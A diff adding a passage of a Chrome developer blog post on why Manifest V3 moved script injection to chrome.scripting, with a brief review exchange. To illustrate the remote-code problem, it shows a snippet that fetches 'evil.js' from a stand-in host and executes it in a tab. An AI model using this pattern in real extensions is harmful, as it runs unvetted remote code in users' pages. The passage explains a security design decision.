site/en/blog/crx-scripting-api/index.md

```diff
@@ -0,0 +1,209 @@
+execute an arbitrary string of code in a target tab. This, in turn, means that a malicious developer
+can fetch an arbitrary script from a remote server and execute it inside any page the extension can
+access. We knew that if we wanted to address the remote code problem that we would have to drop this
+feature.
+
+```js
+let result = await fetch('https://example.com/evil.js');
+let script = await result.text();
+chrome.tabs.executeScript({
+  code: script,
+});
+```
+
+We also wanted to clean up some other, more subtle footguns with the Manifest V2 version's design,
+like as the `matchAboutBlank` property on the options object.
+
+While we could have changed the signature of this method within the Tabs API, we felt that between
+these breaking changes and the introduction of new capabilities (covered in the next section) a
+clean break would be easier for everyone.
+
+### Expanding scripting capabilities
+
+Another consideration that fed into the Manifest V3 design process was a desire to introduce
+additional scripting capabilities to Chrome's extension platform. Specifically, we wanted to add
+support for declarative content scripts and to expand the capabilities of the `executeScript`
+method.
+
+Declarative content scripts support has been an outstanding Chromium feature request for several
+years. Today, Manifest V2 and V3 Chrome extensions can only statically declare content scripts in
+their manifest.json file; the platform doesn't provide a way to register new content scripts, tweak
+content script registration, or unregister content scripts at runtime.
+
+While we knew that we wanted to tackle this feature request in Manifest V3, none of our existing
+APIs felt like the right home. We also considered aligning with Firefox on their [Content Scripts
+API][content-scripts], but very early on we identified a couple major drawbacks to this approach.
+First, we knew that we would have incompatible signatures (e.g. dropping`code` support). Second, our
+API had a different set of design constraints (e.g. needing a registration to persist beyond a
+service worker's lifetime). Finally, this namespace would also pigeonhole us to content script
+functionality where we're thinking about scripting in extensions more broadly.
+
+On the executeScript front, we also wanted to expand what this API could do beyond what the Tabs API version supported. More specifically, we wanted to support functions and arguments, more easily target specific frames, and target non-"tab" contexts.
+
+## Changes in Manifest V3
+
+In the previous section I mentioned that we're planning to add dynamic content script support. While
+I'd love to dig more into what this might look like or how it might work, design goals, or
+capabilities, unfortunately we're not quite ready to share those details.
+
+In the remainder of this post, I'd like to take a closer look at the similarities and differences between `chrome.tabs.executeScript` and `chrome.scripting.executeScript`.
```

Comment:
Wrap

Reply:
This line was replaced by a fuller explanation.